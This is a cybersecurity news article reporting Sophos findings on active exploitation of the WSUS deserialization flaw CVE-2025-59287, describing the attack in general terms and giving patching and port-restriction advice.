Windows Server Update Services (WSUS) vulnerability is actively exploited in the wild. Criminals are using this vulnerability to steal sensitive data from organizations in various industries.The vulnerability, tracked as [CVE-2025-59287](https://cybersecuritynews.com/microsoft-october-2025-patch-tuesday/), was patched by Microsoft on October 14, 2025, but attackers quickly began abusing it after proof-of-concept code became publicly available on GitHub.Sophos telemetry indicates that exploitation began on October 24, 2025, just hours after technical analysis and exploit code were released online.The threat actors targeted internet-facing WSUS servers in universities, technology companies, manufacturing firms, and healthcare organizations, primarily based in the United States.While Sophos has confirmed six incidents so far, security experts believe the actual number of compromised organizations is significantly higher.> Sophos researchers have identified real-world exploitation of a newly disclosed vulnerability in Windows Server Update Services (WSUS), where threat actors are harvesting sensitive data from organizations.> — Sophos X-Ops (@SophosXOps) [October 30, 2025](https://twitter.com/SophosXOps/status/1983880992122097745?ref_src=twsrc%5Etfw)**How the Attacks Unfold**————————–The exploitation leverages a critical deserialization bug in WSUS that allows unauthenticated remote code execution. When attackers target vulnerable servers, they inject Base64-encoded[PowerShell commands](https://cybersecuritynews.com/patchwork-apt-using-powershell-commands/) through nested command processes running under IIS worker privileges.The malicious script executes silently on compromised systems, gathering valuable intelligence about targeted organizations.The harvested data includes external IP addresses and ports of vulnerable hosts, enumerated lists of Active Directory domain users, and detailed network interface configurations. This information is then exfiltrated to webhook.site URLs controlled by the attackers.Sophos researchers [discovered](https://news.sophos.com/en-us/2025/10/29/windows-server-update-services-wsus-vulnerability-abused-to-harvest-sensitive-data/) four unique webhook.site URLs associated with the attacks, with three linked to the platform’s free service tier.By analyzing the request logs on two publicly accessible URLs, researchers observed that exploitation began at 02:53 UTC on October 24 and reached the maximum threshold of 100 requests by 11:32 UTC the same day.The rapid exploitation of this [vulnerability](https://cybersecuritynews.com/cisa-threat-detections-wsus-vulnerability/) demonstrates how quickly threat actors move to weaponize newly disclosed flaws.The indiscriminate nature of the attacks suggests cybercriminals are scanning for exposed WSUS servers on the internet and exploiting them opportunistically rather than targeting specific organizations.According to Rafe Pilling, Director of [Threat Intelligence](https://cybersecuritynews.com/threat-intelligence-for-businesses/) at Sophos, ‘This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.’The stolen data could be used for reconnaissance, follow-up attacks, or sold to other malicious actors on underground marketplaces. Organizations running WSUS services should immediately apply [Microsoft’s security](https://cybersecuritynews.com/microsoft-update-active-directory-sync/) patches and conduct thorough reviews of their network configurations.Additionally, companies should identify any WSUS server interfaces exposed to the internet and restrict access to WSUS ports 8530 and 8531 only to systems that genuinely require connectivity.Security teams should review logs for signs of exploitation and implement network segmentation to prevent lateral movement if compromises are discovered.**Follow us on [Google News](https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&gl=IN&ceid=IN:en), [LinkedIn](https://www.linkedin.com/company/cybersecurity-news/), and [X](https://x.com/cyber_press_org) for daily cybersecurity updates. [Contact us](https://cybersecuritynews.com/contact-us/) to feature your stories.**The post [Hackers Exploiting Windows Server Update Services Flaw to Steal Sensitive Data from Organizations](https://cybersecuritynews.com/wsus-vulnerability-actively-exploited/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
Related Tags:
NAICS: 61 – Educational Services
NAICS: 621 – Ambulatory Health Care Services
NAICS: 611 – Educational Services
NAICS: 334 – Computer And Electronic Product Manufacturing
NAICS: 62 – Health Care And Social Assistance
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 33 – Manufacturing – Metal
Electronics And Other
NAICS: 31 – Manufacturing – Food And Textile
NAICS: 311 – Food Manufacturing
Associated Indicators: